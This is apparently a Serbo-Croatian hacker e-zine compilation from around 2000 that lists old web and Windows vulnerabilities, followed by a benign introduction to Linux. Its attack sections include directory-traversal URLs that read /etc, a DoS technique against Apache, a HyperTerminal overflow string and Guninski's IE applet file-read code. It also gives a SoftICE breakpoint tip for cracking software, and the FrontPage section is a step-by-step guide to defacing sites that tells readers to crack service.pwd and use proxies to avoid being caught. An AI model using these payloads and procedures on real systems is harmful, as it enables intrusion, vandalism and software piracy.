FTP i Telnet passwordi putuju nesifrovani networkom jer ovi protokoli
ne podrzavju ovu funkciju. Posto vecina usera koristi iste passworde
i za logovanje na domeinu neophodnoje sa user-policy prisiliti usere
da koriste razlicite passworde za ovu namenu. Sto se tice ranjivisti
TCP/UDP protokola kod NT-a to prilicno OK osim ranjivih portova od
135-139 koji mogu da se koriste za denial-of-service napada kojom
haker zeli da postigne neke od sledecih rezultata:
- Aktiviranje trojanca kojeg je ranije posstavio I koji postaje aktivan
tek posle reboot-a
- Maskiranje hakerskih aktiviteta (snifovaanja, previsok-procenat ACK
paketa u networku, neobicno ponasanje procesora,)
3
===============================================
=========
6. Stvaranje backspace.bat fajla na serveru

-------------------------------------------------------------------------
Ugrozene su verzije 3.5x i NT 4.0 bez odgovarajuceg Service Packa
(ne secam se tachno koji sp je potreban). Posle ukucavanja:
www.server.com/scripts/script_name%0A%0D>PATH\backspace.bat
stvorice se jedan prazan fajl backspace.bat na tom serveru. Resenje
je instaliranje odgovarajuceg sp-a na taj rachunar sa WinNT.
===============================================
=========
7. Apache HTTP Server - Exploit

-------------------------------------------------------
Ako upishemo u nash browser Url koji ce u sebi da sadrzi preko
hiljadu '/', onda cemo dovesti Apache Web Server u stanje kad
koristi ogromne CPU resurse. Da bi ovaj DDoS (distributed denial of
service) uspeo, potrebno je napraviti puno simultanih konekcija.
Ranjivi verzije Apache Web Servera su sve verzije pre 1.2.5 a ova
verzija 1.2.5 i novije su imune na ovakvu vrstu napada.Napad je
krajnje jednostavan - dodaj te puno '/' u URL i Apache ce biti spreman
da potroshi ogromne resurse dok ne procesira takav zahtev. Ako je
ogroman broj ovakvih zahteva poslat u isto vreme na server, onda bi
isti server mogao biti nedostupan !!!
===============================================
=========
8. PHP Path Revealing Vulnerability

-------------------------------------------------------------
Pomocu ovoga Vulnerability-ja, haker moze doci do informacije gde se
nalazi direktorijum sa PHP podacima. Ovo se deshava na svim
serverima na kojima je ukljucen error_reporting (prijava greshaka).
Ranjivi su sistemi PHP 4.01 i noviji. Ovo shljaka tako shto kada u
browser upishemo nepostojecu stranicu npr. www.server.com/he.php3
i server ce da prijavi Fatal Error i pokazace gde se direktorijum nalazi.
Npr. evo jednog sluchaja:
Fatal error: Unable to open /vhmap/i/n/server.com/he.php3 in - on line

0
No input File specified
Reshenje ovog problema je iskljucivanje error_reporting-a, ali ovo

reshenje moze da izazove i druge nezeljene posledice.
===============================================
=========
9. Sakrivanje IP broja u mIRCu

----------------------------------------------------
Ovo uputstvo sam pisao po ugledu na mIRC 5.71 a isto je i za novije i
starije verzije. Naime, treba uci u opcije i naci pod stavkom Connect
izabrati Firewall. Tu treba chekirati 'Use SOCKS Firewall', za protokol
treba izabrati 'Socks4', u 'Hostname' ukucaj 'interate.com.pe' i u
'Port' ukucaj '1080'. Posle ovoga Restartuj mIRC i onda cesh biti
anoniman. Ovo ce ti mozda malo usporiti mIRC zato shto ce se sve
obavljati preko kompjutera koji se nalazi u Americi, ali vredi. Ako
hocete mozda neshto brze, potrazite proxy adrese za mIRC i isprobajte
ih i nadjite sebi najbrzu.
===============================================
=========
10. Trik u SoftICE za crackere koji nisu znali

--------------------------------------------------------------------------
Ako radite u SoftICE-u i zelite da crackujete neku protekciju u programu,
ja bih vam preporuchio da breakpoint postavite ovako:
bpx hmemcpy
U 90% slucajeva naci cete se u samoj blizini protekcije u kodu, i uz
malo iskustva moci cete da crackujete program. Ovo vazi za sledece
protekcije:
- Serial
- Name/Serial
- Name/Company/Serial
i sl.
===============================================
=========
**********************************************************
*****************
SADRZAJ:
------------------
1. Master Index directory traversal vulnerability
(translated by BaCkSpAcE)
2. PHPix 1.0.X directory traversal vulnerability

(translated by BaCkSpAcE)
3. HTimage.exe vulnerability, part I

(translated & modified by BaCkSpAcE)
4. Front Page Bug

(written by BlackPhoeniX, modified by BaCkSpAcE)
5. IE 5.5/Outlook java security vulnerability

(written by Georgi Guninski, translated by BaCkSpAcE)
6. HyperTerminal Buffer Overflow Vulnerability

(written by USSR Security Advisory, translated by BaCkSpAcE)
7. Osnove Linuxa - Prvi deo

(downloaded from hr site)
8. ALT 255
(written by BaCkSpAcE)
===============================================
========
1. Master Index directory traversal vulnerability

--------------------------------------------------------------------------------
Pronadjena je greshka u Master Indexu koja dozvoljava kretanje
kompletnim sistemom zrtve, uz dozvolu chitanja fajlovai foldera.
Master Index je profesionalni pretrazivachki engine kao shto je
Yahoo i AltaVista. Master Index moze biti pronadjen na adresi:
http://www.armadastyle.com/masterindex.html.
Master Index dozvoljava napadachu da prosurfuje kroz serverske
fajlove koristeci $catigory=_some_dir_variable. Pomocu ovoga je
moguce prochitati bilo koji fajl ili folder sa privilegijama kao i httpd.
Evo vam jedan primer: (Prvi i drugi red su spojeni)
http://www.target.com/cgi-bin/search/search.cgi?keys=*&prc=any&
catigory=../../../../../../../../etc
Proizvodjac Master Indexa je informisan o ovom bugu. On je izjavio

da sachekaju sledecu patchovanu verziju Master Indexa koja bude
objavljena.
===============================================
========
2. PHPix 1.0.X directory traversal vulnerability

------------------------------------------------------------------------------
Pomocu ovog buga na Linux/Unix rachunarima sa PHPix 1.0.0 - 1.0.2
mozete prochitati bilo koji fajl ili folder na serveru. PHPix je
Web-based foto album viewer napisan u PHP. PHPix Photo Album se
oze downloadovati sa http://phpix.org. Pronadjena je greshka takva
da napadach moze da pristupi svim fajlovima koristeci
$mode=album&album=_some_dir_variable sa istim privilegijama kao
i httpd. Evo jednog primera: (Oba donja reda su spojena)
http://target.com/Album/?mode=album&album=..%2F..%2F..%2F..%
2F..
%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
Reshenje ovog problema je downloadovanje nove patchovane verzije
PHPix-a!!!
===============================================
========
3. HTimage.exe vulnerability, part I

-----------------------------------------------------------
Pomocu ovog fajla (/cgi-bin/htimage.exe) koji dolazi uz FrontPage
mozemo da vidimo ceo put do root direktorijuma. Evo jednog primera
www.server.com/cgi-bin/htimage.exe?0,0
Ja sam probao PTT i pokaze da se root nalazi na E:\VirtualWWW\ptt
za sajt PTTa. O ovome cemo nastaviti da pishemo u sledecem
tutorialu. Reshenje je brisanje htimage.exe fajla ili prelazak na *nix,
zato shto Windows serveri dozvoljavaju izvrshavanje exe fajla na
serveru dok kod *nixa to ne moze. Ovo reshenje ce vaziti i za part2
i part3 o HTimage.exe vulnerability.
===============================================
========
4. Front Page Bug

-------------------------------
FrontPage bug je rupa koju nemarljivi administratori cesto ostave na
svojim serverima. Ako trazimo takve stranice na altavisti cemo ih
naci priblizno 10.000. Napisani su hiljade tekstova sa tematikom FP
buga ali kako vidimo jos uvijek ima administratora koji su lenji da
pogledaju ima li njihova stranica ovaj problem.Ovaj nacin je jedan
od najjednostavnijih kojima se mozete posluziti kada zelite defacovati
stranicu. Takodjer, ovaj nacin je dosta omiljen medju mladjom (citaj:
neiskusnijom) hakerskom populacijom jer je vrlo lak za razumjeti i
skoro svako ga moze nauciti, pa ga vecina iskusnijih hakera smtra
lame-om, ali kao sto sam vec rekao, za hakere pocetnike ce biti dosta
dobar jer je lak. I onda kada defaceate stranicu ipak ste d00d, ne
morate nikom reci kako ste je defaceali ;) Jedini uvjet je da imate Win
masinu i da imate FrontPage, a imate ga skoro 100 % jer dolazi
standardno sa Internet Explorerom. Sve sto trebate uraditi je sledece:
U nekom browseru upisite link:service.pwd ili _vti_pvt. Dobicete listu
stranica sa fp bugom. Kliknite na neki od linkova i dobicete index od
_vti_pvt foldera. U stvari _vti_pvt folder i jeste ahilova peta fp bug
stranica, tacnije file koji se zove service.pwd. U tom file-u cete naci
enkriptovan password. Sada ga samo trebate cracknuti. Tu ce vam
najbolje posluziti neki uobicajeni password crack alat poput John
The Rippera ili Cracker Jack-a. Nakon sto ste cracknuli password
sve je fakticki vec uradjeno. Sada otvorite FrontPage i napisite nesto
kao "J4 s4m n4j74j3b4n1j1 h4k3r n4 5v1j37u" ili nesto slicno tome i
zamemorisite to kao index.html. Sada imate vise izbora kako
postaviti vas index.html na stranicu - zrtvu. Prvi je da pokusate
direktno iz FrontPage-a sa opcijem File --> Save As i onda upisete
stranicu zrtvu. Kada vam zatrazi password upisitie vas cracknuti
pass. Hint: Ponekad vas nece ni pitati za password pa pokusajte i to
u krajnjem slucaju. Drugi nacin je da to uradite preko nekog FTP
klijenta. naci imate index.html i pomocu FTP klijenta upoloadate
njega na vasu zrtvu. Naravno kad zatrazi user i password upisite
vas user i cracknuti password. Ovo rijesenje radi u 99 % slucajeva.
Ono 1 % se desi ako je admin kojim slucajem promijenio pass, a ako
je tako moracete ga ponovo cracknuti, ili recimo da ste nesto
napravili pogresno i sada imate pogresan pass. I u tom slucaju ga
cracknite ispocetka. Ima jos jedan nacin da uploadate vas index.html
na zrtvu. Otvorite Windows Explorer i idite na apu zvanu "Web
Folders". Tamo kliknite dva puta na "add webfolder" i upisite url
vase zrtve. Ako upita za pass i user upisite ih a ako ne pita jos bolje
(ovo se desava u 0,01% slucajeva). Sada imate vise opcija na izboru.
index.html (zrtvina defaultna stranica)
index.asp (neki file)
default.html (neka stranica)
default.asp (neki file)
Jednostavni ih sve zamjenite sa vasim index.html
Sada trebate pogledati vasu defaced stranicu. Budite sigurni da
koristite proxy, a ako ne onda recite nekom prijatelju da ode
pogledati, da vi nebi ostavljali svoj log na toj stranici, jer ce vas u
tom slucaju lakse uhvatiti. Ako koristite ovu opciju sa Web Folders
nekada cete dobiti poruku: File is already only, open? Otvorite je i
obradite. Nemojte na ovaj nacin pokusavati otvoriti stranice sa nekih
freeservera, nece vam raditi. Eh da jos nesto: Ako dobijete npr.
www.server.com/osoba nemojte pokusavati haknuti ovo /osoba ako
nemozet haknuti www.server.com.Ima jedna stvar koja bi vam mogla
zagorcati zivot. Naime ne kod svih passworda dobivenih preko FP
buga ne mozete uploadovati preko ftp-a stranicu jer passovi za ftp
i fp nisu isti. Ali to je dosta rijetko medjutim moze se desiti. Ako vam
se desi pokusajte ostale metode ili trazite iducu zrtvu.
===============================================
========
5. IE 5.5/Outlook java security vulnerability

------------------------------------------------------------------------
Georgi Guninski je, kao shto vecina vas zna, jedan od najpoznatijih
pronalazacha rupa u IE/Outlook.Evo sada jednog problema koji daje
veliki rizik po onog ko koristi Microsoft Products. Ova rupa dozvoljava
da ti server vrshi citanje fajlova i chitanje direktorijumske strukture
posle pregleda web-stranice ili chitanja HTML poruke. Problem se
javlja kada se specifira codebase za aplet koji se uchitava iz
<OBJECT> taga i jar fajla.Evo pogledajte sledeci kod:
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>

<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavaco
debase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
Ovaj kod setuje apletov codebase na file:///c:/

Ovo nije problem Java jezika i to nije problem u microsoftovom VM,
vec je problem u codebase-u koji je setovan od strane IE. Izgleda da
pomocu ove rupe mogu da se vrshi upis i izvrshavanje fajlova. Evo
sledeceg koda koji ce vam pomoci:
---------javacodebase1.html-------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE"
VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
----------------------------------------------------------------------
--------gjavacodebase.java--------------------------------------------
......
try
{
u = new URL(getParameter("URL"));
InputStream is=u.openStream();
byte ba[]=new byte[1000];
int l=is.read(ba);
InputStream os=u.openConnection().getInputStream();
String s1=new String(ba,0,l);
print(u.toString());
print(s1);
}
.......
----------------------------------------------------------------------
Microsoftu je javljeno za ovaj problem 14.10.2000 i rekli su da josh

uvek rade na tom patchu. Ako ste zainteresovani idite na sajt
microsofta pa se informishite!
===============================================
========
6. HyperTerminal Buffer Overflow Vulnerability

------------------------------------------------------------------------------
Sistemi koji podrzavaju ovaj problem su Windows 2000, Windows
ME, Windows 98 i Windows 98SE. Ova rupa dozvoljava da se
uradi buffer overflow u HyperTerminal Telnet Clientu i moze da
dozvoli napadacu da izvrshi neki kod na drugom sistemu. Ako
korisnik otvori HTML poruku koja ima ovaj HTML kod, onda ce
isti korisnik da nastrada. Evo vam primera:
telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/
Patchovi:
Windows 98 i 98SE
http://download.microsoft.com/download/win98/Update/12395/W98/
EN-US/274548USA8.EXE
Windows ME
http://download.microsoft.com/download/winme/Update/12395/Win
Me/
EN-US/274548USAM.EXE
Windows 2000 (problem se otklanja instaliranjem Service Packa br.1)

http://www.microsoft.com/downloads/release.asp?releaseid=25112
===============================================
========
7. Osnove Linuxa - Prvi deo

------------------------------------------------
Linux? Sta je to? Treba li to ikome? Cemu sluzi? Valja li to? Radi li to pod
Windowsima? I jos hiljade pitanja o Linuxu. Sta je, zaista Linux? Treba li
vam? Mozete li ziveti bez njega? Zasto uopse citate ovaj umetak? Hocete
li nesto nauciti ili cete samo izgubiti vrijeme?
Vec nekoliko godina koplja se lome oko Linuxa. Suprotstavljene su dve
struje - jedna je velika grupa vernih korisnika Microsoftovih proizvoda
koja Linux smatra promasajem, a druga je mala grupa zadovoljnih
korisnika
Linuxa. Najcesce stvari koje se Linuxu zameraju je "nekompatibilnost s
Windowsima" i nedostatak programske podrske. Obe su tvrdnje netacne.
Prva
je, zapravo, poluistinita - Windowsi ne mogu vrtiti niti jedan program
pisan pod Linuxom, ali Linux moze vrtiti neke programe pisane pod
Windowsima. Druga tvrdnja je tvrdnja o nedostatku programske
podrske. Iako
je dostupno na stotine megabajta programa koje je Linux ili nasledio ili
su to potpuno novi programi, nepostojanje MS Office paketa za Linux
obično
nepoznavatelje i kvazistrucnjake asocira na siromastvo.
No, ostavimo igranje advokata za neku drugu priliku, u ovom umetku
imat
ćete prilike upoznati Linux iznutra, ąto on stvarno jest i o čemu se uopće
radi. Prije nego nastavite, svakako učinite uslugu sebi (ne meni, niti
susjedu, niti prijateljici) - ako nikad prije niste imali priliku
instalirati Linux OBAVEZNO prvo pročitajte umetak do kraja da biste
dobili
dojam o čemu se priča i o kakvoj se instalaciji uopće radi. Tek onda
moľete kroz upute za instalaciju ići korak po korak.
Ne zaboravite da je cijela priča o Linuxu daleko, daleko obimnija nego ju
moľe ispričati ovaj umetak - zato će biti obrađene samo zbilja
najosnovnije stvari, no kad već naučite ovo osnovno, ostalo će ići lakąe.
Zato se od čitatelja očekuje i poznavanje rada računala i barem
operativnog sustava DOS jer će mnoge stvari biti objaąnjene
usporedbom s
DOSom.
Linux je operativni sustav. Operativni sustav (kraće: OS) je najniľa
softverska stepenica u vaąem računalu. OS je ono pod čim vaąi programi
rade i ono ąto se brine o svim potrebama programa. Najpoznatiji
operativni
sustavi na PC platformi su MS DOS, Windows95 i Windows NT. Windowsi
3.1
nisu operativni sustav već je to samo grafičko okruľje koje radi pod
operativnim sustavom MS DOS. Windows95 je pomalo hibridan OS koji
nudi i
grafičko okruľje i komandnu liniju kao ranije verzije MS DOSa, dok je
Windows NT pravi operativni sustav.
Linux je po svojim svojstvima najsličniji Windows NT operativnom
sustavu -
kao i NT, Linux ne vuče za sobom nikakvo staro naslijeđe (poput DOS-a),
i
kao i NT, Linux je u potpunosti 32-bitni OS (za razliku od DOS-a i
Windowsa 95 koji imaju i 16-bitnog naslijeđa). No, za razliku od
Microsoftovih produkata koji svi imaju neke zajedničke spone i
zajednički
vizualni identitet, Linux je jedan od operativnih sustava izraslih oko
dosta stare UNIX arhitekture.
Jedna od karakteristika tih operativnih sustava na koje obično nisu
navikli oni koji rade pod Microsoftovim operativnim sustavima je striktno
razlikovanje velikih i malih slova. Imate li dvije datoteke na disku,
jedna se zove "Pismo", a druga "pismo" - te dvije datoteke će biti
prihvaćene kao različite, jer se razlikuju u početnom slovu. Jedno je
veliko a drugo malo. Tako i naredbe - sve se naredbe piąu malim
slovima.
Dogodi li vam se da slučajno napiąete naredbu velikim slovima Linux je
neće prepoznati. Moľda će vas u početku dovoditi u nedoumicu ako
nekom
programu moľete dati argumente "-r" i "-R" koji su u biti isto slovo
(zanemarimo li ąto je jedno veliko a drugo malo) a rade različite stvari.
No malo samodiscipline će vas naučiti da piąete naredbe malim slovima i
da
tako komunicirate s računalom UMJESTO DA VIČETE NA NJEGA VELIKIM
SLOVIMA.
Iako je Linux vrlo liberalan glede znakova koje smijete upotrebljavati za
nazive datoteka, izbjegavajte upotrebu naąih slova.
Je li Linux onda samo jedan od UNIX-a? Linux ipak nije Unix. Da bi jedan
OS imao pravo nazivati se Unixom mora zadovoljiti određene uvjete, a
Linux
zasad zadovoljava samo par njih, no i to je dovoljno da ga se smatra
članom Unix zajednice.
Idejni tvorac Linuxa je Linus Torvalds (torvalds@linux.cs.Helsinki.FI)
koji je prije nekoliko godina započeo projekt potpuno besplatnog
operativnog sustava. Zahvaljujući Internetu i ogromnoj količini
entuzijazma sa svih strana svijeta, Linux je postao ono ąto je danas i ąto
će u budućnosti biti.
Linux je, dakle, samostalan, besplatan OS. To prije svega znači da za
koriątenje Linuxa nikom ne trebate platiti, to je potpuno besplatan OS.
Zatim, samom činjenicom da je riječ o operativnom sustavu a ne
"običnom"
programu, Linux nije moguće pogoniti iz DOS-a ili Windows-a, jer je
Linux
u stvari zamjena za DOS i Windows-e. Oni mogu koegzistirati na disku,
ali
ne mogu u isto vrijeme imati vlast nad računalom. Tj, na računalu
moľete
raditi ili pod Windowsima ili pod Linuxom, nikad istovremeno. Istina
postoje za Linux emulatori koji omogućuju startanje DOS ili Windows
programa, ali se oni i dalje izvrąavaju pod Linuxom kao OS-om.
Linux moľe biti smjeąten na istom disku na kojem je već instaliran DOS
ili
Windows, ali moľe biti i u zasebnoj particiji. Svaki od ta dva načina
instaliranja ima svoje prednosti i mane. U prvom slučaju, kad Linux
instalirate na već formatizirani disk s FAT tablicom nećete morati
fdiskom
mijenjati disk, praviti nove particije i slično. No, neće se sve
distribucije dati instalirati na FAT particiju. U drugom slučaju, kad
Linux instalirate na njegovu vlastitu particiju, podaci s te particije
dostupni su samo Linuxom, ne i DOS-om (osim uz pomoć posebnih
programa).
No dobit je viąestruka: na svojoj osobnoj particiji Linux se ponaąa
udobnije, sigurnije i viąestruko je brľi nego na FAT particiji.
Uglavnom, jednom instaliran Linux moći ćete podići ili prilikom paljenja
računala, kad će vas poseban program koji Linux instalira pitati ľelite li
podići Linux ili neki drugi OS (DOS, Windows). Ako iz nekog razloga ne
instalirate taj program, moći ćete iz DOS-a (i Win95, ne i iz Win NT)
malim programčićem ugasiti OS na kojem trenutno radite i podići Linux.
Jednom podignut Linux javit će se pozdravnom porukom i promptom
"Login:".
Obicno u tekstualnom modu, ali ľelite li tako, Linux odmah po podizanju
moľe prijeći u svoje grafičko okruľje (XWindows, skraćeno X). Ovaj OS
moľete po vlastitoj ľelji koristiti u tekstualnom i u grafičkom modu, pri
čemu se osnovna funkcionalnost operativnog sustava ne razlikuje
previąe
ovisno o tome radite li u grafičkom ili tekstualnom načinu rada.
Spomenuo sam "Login:" prompt s kojim se vjerojatno dobar dio čitatelja
već
susreo. Kako je Linux viąekorisnički OS, pri svakom započinjanju posla
potrebno se predstaviti računalu, reći "ja sam taj i taj", da bi računalo
znalo s kojim korisnikom ima posla i da bi mu učinilo dostupnim njegove
podatke, a nedostupnim tuđe podatke.
Ne, ne morate biti shizofrenik da biste koristili multikorisničke
mogućnosti Linuxa. Linux jednako radi i s samo jednim korisnikom na
stroju
kao i kad ih ima desetak i svi istovremeno rade. To mu omogućuje
ugrađeni
multitasking.
Viąekorisnički stroj je svaki stroj koji dozvoljava rad viąe korisnika na
istom stroju. Za razliku od MS DOS-a i starih Windows-a koji su
pretpostavljali da je vlasnik računala istovremeno i jedini korisnik,
Windows NT, Linux i mnogi drugi OS-ovi pretpostavljaju da vlasnik
računala
nije jedini korisnik stroja, već da stroj mogu koristiti i druge osobe.
Pri tome nije bitno da li oni računalu pristupaju istovremeno ili jedan po
jedan. Isto tako, nije vaľno pristupaju li računalu s udaljenog terminala
ili direktno na računalu (u tom slučaju govorimo o "konzoli").
Jedna od karakteristika viąekorisničkog stroja je zaątita podataka.
Zamislimo primjerice da ste na vaąe računalo instalirali Linux. I vi u
njemu radite, ali upada vam u sobu brat/sestra/muľ/ľena i kaľe da
mu/joj
treba računalo za obaviti neke poslove. Pristanete li, vaą jednokorisnički
Linux tad počinje pokazivati svoje viąekorisničke prednosti: dajte Linuxu
do znanja da će joą jedna osoba koristiti računalo (stručno bi se to reklo
napravite novi account na računalu), a Linux će sam brinuti o tome da ta
osoba ima sve potrebno za rad, ali će pri tome paziti i da ta osoba,
primjerice, ne moľe pristupati vaąim podacima već samo onima koje joj
dozvolite. Isto tako, podaci te osobe bit će zaątićeni od vaąeg pogleda
(ili pogleda neke treće osobe). Uzajamno si isto tako nećete moći
mijenjati ili brisati podatke. Dodatno, ta druga osoba uopće ne mora
sjediti za vaąim računalom - ona se moľe modemom, mreľnom karticom
ili na
neki treći način povezati s vaąim računalom i s nekog drugog mjesta
(druge
sobe, druge zgrade ili drugog kraja svijeta) raditi kao da sjedi u vaąoj
sobi za vaąim računalom.
Ideja viąekorisničkog stroja je, dakle, napraviti takvu okolinu u kojoj će
svatko, bez obzira gdje se nalazi i da li za vaąim računalom netko već
radi, moći pristupiti računalu i raditi kao da sjedi za njim. Pri tome će
imati jedan dio diskovnog prostora samo za sebe, koji će biti zaątićen od
nepoľeljnih, ali će moći bez ikakvih ograničenja dijeliti ľeljene datoteke
s drugim osobama.
Multitasking je sposobnost operativnog sustava (ne računala nego baą
operativnog sustava) da izvrąava viąe programa odjednom. Iako ulazeći
dublje u analizu multitaskinga neizbjeľno dodirujemo područje
multiprocesorskih računala, za ugodan multitasking dovoljno nam je i
računalo s jednim procesorom.
Multitasking, dakle, ne ovisi o računalu niti o procesoru, već o
operativnom sustavu koji koristite. Tako primjerice Amiga i Macintosh
računala imaju OS od samog početka rađen s idejom multitaskinga, dok
PC
računala imaju vrlo ąarenu ponudu operativnih sustava s nekoliko
različitih mogućnosti multitaskinga.
Počevąi joą od starog MS DOS-a, koji nikad nije bio zamiąljen kao OS s
mogućnostima multitaskinga, preko Windows 3.x serije koja je
"dodavala"
DOS-u mogućnost izvrąavanja viąe programa istovremeno (ili nekih
programa
nezavisnih proizvođača, poput DesqView-a), sve do Win95 i WinNT koji u
računalo uvode kvalitetne multitasking mogućnosti. U igri je čak i
Calderin OpenDOS, kopija MS DOS-a koja ima ugrađen multitasking.
Za razliku od OpenDOS-a i Windowsa, Linux od samog svog nastanka
radi kao
multitasking OS koji za sobom ne vuče potrebu za kompatibilnoąću s
starijim verzijama.
Moć multitaskinga najbolje ćete osjetiti radite li imalo zahtjevnije
poslove za računalom. Trebate li računalo samo da biste na njemu
izvrąavali jedan program (Word, bazu podataka, program za crtanje..)
onda
vam multitasking i nije pretjerano koristan (iako je zgodno odigrati
Solitaire dok baza traga za podacima). No, trebate li istovremeno
pokrenuti nekoliko programa, multitasking je jedino rjeąenje.
Primjerice,
osoba iz prethodnog poglavlja baą mora taj čas napisati neki dokument
dok
vi radite ozbiljne stvari na računalu (Doom i slično). Veľe li se preko
terminala moći će bez problema uraditi svoj posao dok se vi zabavljate.
Pri tome nećete zasmetati jedno drugome, niti ćete imati potrebe
razmiąljati da li joą tko osim vas radi na računalu - Linux sam brine o
opsluľivanju oba korisnika.
Linux je dosta skroman po izboru hardwarea na kojem ľeli raditi.
Zavrtjeti
ga moľete i na 386SX računalu s 4MB memorije i Hercules video
karticom.
Iako je to takoreći zastario procesor, na njemu Linux radi jednako kao i
na 486 ili Pentium procesoru - razlika je jedino u brzini izvrąavanja
programa.
Nekakav logičan minimum bilo bi 486 računalo s 8MB memorije, na
kojem se
Linux dosta ľivlje ponaąa, i to je najmanja konfiguracija u kojoj moľete
relativno ugodno raditi u XWindows sučelju (Linuxovo grafičko sučelje,
zapravo uobičajeno grafičko sučelje Unixa). Već s 16MB memorije Linux
se
osjeća komotno, a s jačim procesorom i viąe memorije moľete samo
profitirati. Linux ne pati toliko na procesor koliko na memoriju, pa ćete
dodavanjem viąe memorije bolje profitirati nego stavljanjem novog
procesora. Osobito imate li manje od 8MB memorije u računalu.
Diskovni prostor je gotovo jednako ątedljiv. Neke od Linux distribucija
su
gotovo u cijelosti rađene tako da se mogu pokretati s CD-a, pa je sve ąto
trebate učiniti - staviti CD u čitač i pokrenuti Linux, koji će za svoje
najminimalnije potrebe (ne viąe od nekoliko megabajta prostora ako ne
trebate swap datoteku) koristiti DOS particiju, a najveći dio Linuxa bit
će učitavan s CD-a.
najmanja "normalna" instalacija Linuxa na disk bila bi oko dvadesetak
MB.
Unutar tih 20-tak MB moľete smjestiti sve najosnovnije stvari,
uključujući
tu i C prevodilac. Moľete instalirati i neku iz serije "MiniLinux"
distribucija, koje zauzimaju čak i manje prostora.
Dakako da s tako "osakaćenim" Linuxom nećete imati sve prednosti koje
vam
pruľa kompletnija distribucija, koja bi zauzela od 50 do 500MB prostora
na
disku, ovisno o ľeljama i potrebama. Nekakva srednja vrijednost bila bi
100-150MB prostora za ugodan rad s paľljivo biranim alatima.
Grafička kartica moľe biti bilo koja VGA kartica, čak i CGA, EGA ili
Hercules. Imate li negdje u praąnjavom podrumu Hercules karticu i
monitor
moľete i nju staviti u računalo, a Linux će ju moći iskoristiti.
Pristup vaąeg Linux računala svijetu ostvarivat ćete obično jedan od ova
dva načina: Ethernet karticom ili modemom. Zato je neophodno imati
jedno
od to dvoje. S Ethernet karticama nema problema, podrľano je sve na
ąto u
normalnim uvjetima moľete naići. Modem isto tako moľe biti bilo koji,
vanjski ili ugradivi. Ali ako moľete izbjegavajte P&P podrąku - isključite
ju na svakoj kartici koju moľete isključiti, uątedjet ćete si dosta
vremena oko konfiguriranja računala i traľenja greąaka.
Poľeljno je, uglavnom zbog problema pri instalaciji, imati ATAPI CD-
ROM.
Razlika između ATAPI i ostalih pogona je ąto se ATAPI pogoni veľu na
HDD
kontroler, kao disk. Ostali se obično veľu na neku karticu u računalu.
Nemate li ATAPI CD-ROM, nemojte očajavati, Linux će vjerojatno
prepoznati
i vaą. Ako ga ne prepozna, morat ćete mu ručno objaąnjavati koji pogon
imate u računalu.
Zvučne kartice znaju praviti probleme s Linuxom. U principu je to samo
pitanje rasprostranjenosti zvučne kartice. Za Linux ćete vrlo rijetko naći
upravljačke programe (drivere, u slučaju Linuxa module) za zvučnu
karticu
koje je radio proizvođač te kartice; u najvećem broju slučajeva podrąku
rade sami korisnici kartice. To nipoąto ne znači da su takvi programi
manje kvalitetni ili manje pouzdani - često su manji, bolji i brľi od onih
koje za istu tu karticu ali drugi OS isporučuje proizvođač. Ako je vaąa
zvučna kartica rijetka, vjerojatno nećete lako naći podrąku za nju, ali
ako je imalo poznatija - podrąku ćete sigurno imati. "Kompatibilne"
kartice često zbog svoje nesavrąene kompatibilnosti imaju problema s
podrąkom za karticu koju emuliraju, ali i za njih postoje neka generička
rjeąenja. U biti, dosta mali broj zvučnih kartica nabavljivih u trgovinama
nema podrąku u Linuxu.
Za razliku od DOSa ili Windowsa, Linux nije ograničen na jednu jedinu
distribuciju. Sjetimo se, Linux je besplatan operativni sustav koji moľete
cjelokupnog dobiti u source-u. No, distribucije se (i) plaćaju. Zaąto je
tako? Postoji viąe različitih distribucija, koje svaka u osnovi imaju
besplatan Linux, a neke osim njega imaju i posebno pisane programe.
Kupujući distribuciju, ne plaćate Linux, već plaćate trud autora
distribucije da skupe programe i sloľe ih na CD, a u nekim slučajevima
plaćate i posebne programe koji dolaze uz distribuciju a koji nisu
besplatni. Bitne razlike u distribucijama nema, niti su one međusobno
"nekompatibilne". Riječ je o jednom te istom Linuxu koji je isporučen s
viąe ili manje dodatnih programa, ili s nekim posebnim dodacima, ovisno
o
distribuciji. Dakle, ne moľete pogrijeąiti odlučite li se za ovu ili onu
distribuciju, uvijek ćete na kraju dobiti isti rezultat - Linux.
Za koju se distribuciju odlučiti? ®elite li besplatnu distribuciju, moľete
ju skinuti s Interneta (ili instalirati Slackware s PC Chipovog CD-a), a
komercijalne trebate naručiti.
Tri najpoznatije i najomiljenije distribucije su Slackware, RedHat i
Debian. Sve tri nabavljive su preko Interneta i ne trebate plaćati za
njih. Dok je Slackware neka vrst legende i mjerila za druge distribucije,
RedHat i Debian su omiljene zbog mnogih korisnih sitnica, primjerice
vrlo
laganog biranja koje aplikacije ľelite instalirati i koje maknuti, te
mogućnosti gotovo automatskog upgrade-a preko Interneta.
Komercijalne distribucije nude najrazličitiji izbor, često na viąe od
jednog CD-a. Svaka od njih ima svojih prednosti - morate li baą kupiti
komercijalnu distribuciju, birajte onu koja najbolje zadovoljava vaąe
potrebe. Ako ste početnik, nemojte odmah skakati na komercijalnu
distribuciju - instalirajte za početak neku besplatnu, iľivljavajte se na
njoj dok ne naučite malo viąe o Linuxu i kad barem malo uđete u bit tog
OS-a bit će vam puno lakąe odabrati komercijalnu distribuciju.
Sve konfiguracije moguće je instalirati s CDa, a instaliranje s diskete
podrľavaju Debian, Linuxware, RedHat, Slackware i WGS Linux Pro; FTP-
om je
moguće nabaviti Craftworks, Linuxware, RedHat, Slackware i WGS; s
lokalnog
diska (nekog poddirektorija na disku) moguće je instalirati sve
